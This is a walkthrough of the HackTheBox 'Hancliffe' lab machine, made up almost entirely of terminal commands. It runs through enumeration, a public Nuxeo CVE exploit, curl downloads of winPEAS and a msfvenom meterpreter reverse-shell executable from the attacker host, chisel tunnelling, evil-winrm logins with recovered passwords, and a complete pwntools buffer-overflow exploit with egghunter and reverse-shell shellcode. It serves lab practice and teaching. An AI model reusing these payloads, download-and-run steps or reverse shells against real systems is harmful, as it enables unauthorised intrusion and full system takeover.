HackTheBox – Hancliffe Walkthrough – In English
┌──(root💀kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.115
┌──(root💀kali)-[/home/kali/Downloads]
└─# cat /etc/hosts | grep 10.10.11.115
┌──(root💀kali)-[/home/kali/Downloads]
└─# gobuster dir -u hancliffe.htb -w /usr/share/wordlists/dirb/common.txt -b 404
http://hancliffe.htb/maintenance
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-small-files.txt
┌──(root💀kali)-[/home/kali/Downloads]
└─# gobuster dir -u hancliffe.htb/maintenance -w /opt/SecLists/Discovery/Web-Content/raft-small-files.txt -b 404,502
┌──(root💀kali)-[/home/kali/Downloads]
└─# ffuf -u “http://10.10.11.115/maintenance/..;/FUZZ” -mc 200 -w /home/kali/Downloads/SecLists/Discovery/Web-Content/raft-small-files.txt
http://hancliffe.htb/maintenance/..;/home.html
http://hancliffe.htb/maintenance/..;/login.jsp
┌──(root💀kali)-[/home/kali/Downloads]
└─# searchsploit Nuxeo
https://github.com/mpgn/CVE-2018-16341
┌──(root💀kali)-[/home/kali/Downloads]
└─# git clone https://github.com/mpgn/CVE-2018-16341.git
┌──(root💀kali)-[/home/kali/Downloads/CVE-2018-16341]
└─# python3 ./CVE-2018-16341.py
command (WIN)> whoami
┌──(root💀kali)-[/home/kali/Downloads]
└─# nc -lvnp 1234
As you can see, we have ‘svc_account’ shell. As I said, this is not a interactive shell, just a POC. However, we can gain powershell access via this POC. We need base64 encoded powershell payload. You can craft it via RevShells website, choose powershell #3 (base64)
PS C:\Nuxeo> whoami
https://github.com/carlospolop/PEASS-ng/releases/tag/refs/pull/253/merge
┌──(root💀kali)-[/home/kali/Downloads]
└─# python3 -m http.server 8000
PS C:\Nuxeo> curl 10.10.14.4:8000/winPEASx64.exe -o winPEASx641.exe
PS C:\Nuxeo> .\winPEASx641.exe
When we run winpeas, we see a lot of information. One of the above services, which listens on port 9512, is vulnerable.
┌──(root💀kali)-[/home/kali/Downloads]
└─# searchsploit ‘unified remote 3’
msf6 > use /exploit/multi/handler
msf6 exploit(multi/handler) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 10.10.14.4
msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o reverse.exe
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.4
msf6 exploit(multi/handler) > exploit
PS C:\Nuxeo> curl 10.10.14.4:8000/reverse.exe -o rev.exe
PS C:\Nuxeo> .\rev.exe
meterpreter > getuid
meterpreter > portfwd add -l 9512 -p 9512 -r 10.10.11.115
┌──(root💀kali)-[/home/kali/Downloads]
└─# netstat –nlpt
meterpreter > background
msf6 exploit(multi/handler) > exploit
┌──(root💀kali)-[/home/kali/Downloads]
└─# locate 49587.py
┌──(root💀kali)-[/home/kali/Downloads]
└─# python3 -m http.server 80
┌──(root💀kali)-[/home/kali/Downloads]
└─# python2 49587.py 127.0.0.1 10.10.14.4 reverse.exe
meterpreter > getuid
meterpreter > pwd
meterpreter > cd Desktop
meterpreter > dir
meterpreter > cat user.txt
PS C:\Users\clara> curl 10.10.14.102:80/winPEASx64.exe -o win64.exe
PS C:\Users\clara> .\win64.exe
Url: http://localhost:8000
Username: hancliffe.htb
Password: #@H@ncLiff3D3velopm3ntM@st3rK3y*!
We get the generated password : AMl.q2DHp?2.C/V0kNFU
PS C:\Users\clara> curl 10.10.14.102:80/chisel.exe -o chisel.exe
┌──(root💀kali)-[/home/kali/Downloads]
└─# ./chisel server -p 8000 –reverse
PS C:\Users\clara> .\chisel.exe client 10.10.14.102:8000 R:5985:127.0.0.1:5985
┌──(root💀kali)-[/home/kali/Downloads]
└─# evil-winrm -i 127.0.0.1 -u development -p ‘AMl.q2DHp?2.C/V0kNFU’
*Evil-WinRM* PS C:\Users\development\Documents> whoami
*Evil-WinRM* PS C:\Users\development\Documents> cd ..
*Evil-WinRM* PS C:\Users\development> cd ..
*Evil-WinRM* PS C:\Users> cd ..
┌──(root💀kali)-[/home/kali/Downloads]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.102 LPORT=7575 -b “\x00” EXITFUNC=thread -f python
Output:
buf = b””
buf += b”\xd9\xcb\xd9\x74\x24\xf4\xbb\xd3\x47\x73\xbc\x5d\x31″
buf += b”\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x8e\x54\x91″
buf += b”\x49\xcc\xb3\xd7\xb2\x2c\x44\xb8\x3b\xc9\x75\xf8\x58″
buf += b”\x9a\x26\xc8\x2b\xce\xca\xa3\x7e\xfa\x59\xc1\x56\x0d”
buf += b”\xe9\x6c\x81\x20\xea\xdd\xf1\x23\x68\x1c\x26\x83\x51″
buf += b”\xef\x3b\xc2\x96\x12\xb1\x96\x4f\x58\x64\x06\xfb\x14″
buf += b”\xb5\xad\xb7\xb9\xbd\x52\x0f\xbb\xec\xc5\x1b\xe2\x2e”
buf += b”\xe4\xc8\x9e\x66\xfe\x0d\x9a\x31\x75\xe5\x50\xc0\x5f”
buf += b”\x37\x98\x6f\x9e\xf7\x6b\x71\xe7\x30\x94\x04\x11\x43″
buf += b”\x29\x1f\xe6\x39\xf5\xaa\xfc\x9a\x7e\x0c\xd8\x1b\x52″
buf += b”\xcb\xab\x10\x1f\x9f\xf3\x34\x9e\x4c\x88\x41\x2b\x73″
buf += b”\x5e\xc0\x6f\x50\x7a\x88\x34\xf9\xdb\x74\x9a\x06\x3b”
buf += b”\xd7\x43\xa3\x30\xfa\x90\xde\x1b\x93\x55\xd3\xa3\x63″
buf += b”\xf2\x64\xd0\x51\x5d\xdf\x7e\xda\x16\xf9\x79\x1d\x0d”
buf += b”\xbd\x15\xe0\xae\xbe\x3c\x27\xfa\xee\x56\x8e\x83\x64″
buf += b”\xa6\x2f\x56\x2a\xf6\x9f\x09\x8b\xa6\x5f\xfa\x63\xac”
buf += b”\x6f\x25\x93\xcf\xa5\x4e\x3e\x2a\x2e\x7b\xb5\x3a\xc8″
buf += b”\x13\xcb\x42\x09\x73\x42\xa4\x5b\x6b\x03\x7f\xf4\x12″
buf += b”\x0e\x0b\x65\xda\x84\x76\xa5\x50\x2b\x87\x68\x91\x46″
buf += b”\x9b\x1d\x51\x1d\xc1\x88\x6e\x8b\x6d\x56\xfc\x50\x6d”
buf += b”\x11\x1d\xcf\x3a\x76\xd3\x06\xae\x6a\x4a\xb1\xcc\x76″
buf += b”\x0a\xfa\x54\xad\xef\x05\x55\x20\x4b\x22\x45\xfc\x54″
buf += b”\x6e\x31\x50\x03\x38\xef\x16\xfd\x8a\x59\xc1\x52\x45″
buf += b”\x0d\x94\x98\x56\x4b\x99\xf4\x20\xb3\x28\xa1\x74\xcc”
buf += b”\x85\x25\x71\xb5\xfb\xd5\x7e\x6c\xb8\xf6\x9c\xa4\xb5″
buf += b”\x9e\x38\x2d\x74\xc3\xba\x98\xbb\xfa\x38\x28\x44\xf9″
buf += b”\x21\x59\x41\x45\xe6\xb2\x3b\xd6\x83\xb4\xe8\xd7\x81″
Reference Link: https://7rocky.github.io/en/htb/hancliffe/
Exploit.py
from pwn import *
io = remote(‘hancliffe.htb’, 9999)
offset = 66
jmp_eax = p32(0x719023b3)
#sub sp,0x150
egghunter = (b”\x66\x81\xEC\x50\x01\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53″
b”\x53\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08″
b”\x3c\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75″
b”\xd7\xff\xe7″)
#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.74 LPORT=7575 -b “\x00” EXITFUNC=thread -f python
buf = b””
buf += b”\xd9\xcb\xd9\x74\x24\xf4\xbb\xd3\x47\x73\xbc\x5d\x31″
buf += b”\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x8e\x54\x91″
buf += b”\x49\xcc\xb3\xd7\xb2\x2c\x44\xb8\x3b\xc9\x75\xf8\x58″
buf += b”\x9a\x26\xc8\x2b\xce\xca\xa3\x7e\xfa\x59\xc1\x56\x0d”
buf += b”\xe9\x6c\x81\x20\xea\xdd\xf1\x23\x68\x1c\x26\x83\x51″
buf += b”\xef\x3b\xc2\x96\x12\xb1\x96\x4f\x58\x64\x06\xfb\x14″
buf += b”\xb5\xad\xb7\xb9\xbd\x52\x0f\xbb\xec\xc5\x1b\xe2\x2e”
buf += b”\xe4\xc8\x9e\x66\xfe\x0d\x9a\x31\x75\xe5\x50\xc0\x5f”
buf += b”\x37\x98\x6f\x9e\xf7\x6b\x71\xe7\x30\x94\x04\x11\x43″
buf += b”\x29\x1f\xe6\x39\xf5\xaa\xfc\x9a\x7e\x0c\xd8\x1b\x52″
buf += b”\xcb\xab\x10\x1f\x9f\xf3\x34\x9e\x4c\x88\x41\x2b\x73″
buf += b”\x5e\xc0\x6f\x50\x7a\x88\x34\xf9\xdb\x74\x9a\x06\x3b”
buf += b”\xd7\x43\xa3\x30\xfa\x90\xde\x1b\x93\x55\xd3\xa3\x63″
buf += b”\xf2\x64\xd0\x51\x5d\xdf\x7e\xda\x16\xf9\x79\x1d\x0d”
buf += b”\xbd\x15\xe0\xae\xbe\x3c\x27\xfa\xee\x56\x8e\x83\x64″
buf += b”\xa6\x2f\x56\x2a\xf6\x9f\x09\x8b\xa6\x5f\xfa\x63\xac”
buf += b”\x6f\x25\x93\xcf\xa5\x4e\x3e\x2a\x2e\x7b\xb5\x3a\xc8″
buf += b”\x13\xcb\x42\x09\x73\x42\xa4\x5b\x6b\x03\x7f\xf4\x12″
buf += b”\x0e\x0b\x65\xda\x84\x76\xa5\x50\x2b\x87\x68\x91\x46″
buf += b”\x9b\x1d\x51\x1d\xc1\x88\x6e\x8b\x6d\x56\xfc\x50\x6d”
buf += b”\x11\x1d\xcf\x3a\x76\xd3\x06\xae\x6a\x4a\xb1\xcc\x76″
buf += b”\x0a\xfa\x54\xad\xef\x05\x55\x20\x4b\x22\x45\xfc\x54″
buf += b”\x6e\x31\x50\x03\x38\xef\x16\xfd\x8a\x59\xc1\x52\x45″
buf += b”\x0d\x94\x98\x56\x4b\x99\xf4\x20\xb3\x28\xa1\x74\xcc”
buf += b”\x85\x25\x71\xb5\xfb\xd5\x7e\x6c\xb8\xf6\x9c\xa4\xb5″
buf += b”\x9e\x38\x2d\x74\xc3\xba\x98\xbb\xfa\x38\x28\x44\xf9″
buf += b”\x21\x59\x41\x45\xe6\xb2\x3b\xd6\x83\xb4\xe8\xd7\x81″
payload = b”
payload += egghunter
payload += b’\x90′ * (offset – len(egghunter))
payload += jmp_eax
payload += b’\x90′ * 50
payload += b’w00tw00t’
payload += buf
io.sendlineafter(‘Username: ‘,’alfiansyah’)
io.sendlineafter(‘Password: ‘, ‘K3r4j@@nM4j@pAh!T’)
io.sendlineafter(‘FullName: ‘, ‘what ever’)
io.sendlineafter(‘Input Your Code: ‘, payload)
┌──(root💀kali)-[/home/kali/Downloads]
└─# nc -lvnp 7575
┌──(root💀kali)-[/home/kali/Downloads]
└─# python3 exploit.py
C:\Windows\system32>cd ..
C:\Windows>cd ..
C:\>cd Users
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>type root.txt
Reference Link: https://7rocky.github.io/en/htb/hancliffe/